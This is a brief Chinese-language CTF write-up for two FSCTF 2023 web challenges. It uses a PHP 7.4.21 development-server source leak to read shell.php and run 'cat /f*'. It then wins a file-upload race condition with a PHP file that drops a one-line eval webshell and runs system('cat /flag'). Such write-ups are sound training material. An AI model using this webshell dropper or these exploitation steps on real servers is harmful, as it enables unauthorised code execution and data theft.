FSCTF 2023

发布时间 2023-10-31 17:48:19作者: kode

签到plus

dirsearch扫到文件shell.php

 可以看到php版本为7.4.21,这道题的话和今年羊城杯的一道题很像,都是利用PHP<=7.4.21 Development Server源码泄露漏洞 (https://buaq.net/go-147962.html)

然后我们就可以看到shell.php的内容

 将响应包的内容以txt文档保存后打开

 可以看到我们直接进行命令执行就可以了,传入???=cat /f*

加速加速

文件上传条件竞争

创建一个ctf.php文件

<?php $f=fopen("7.php","w"); fputs($f,'<?php @eval($_POST[cmd]);?>');?>

然后将此文件不断进行上传,并且不断访问/upload/ctf.php文件

 

 可以看到7.php一句话木马文件创建成功了,然后我们直接访问一句话木马进行命令执行就可以了。

cmd=system('cat /flag');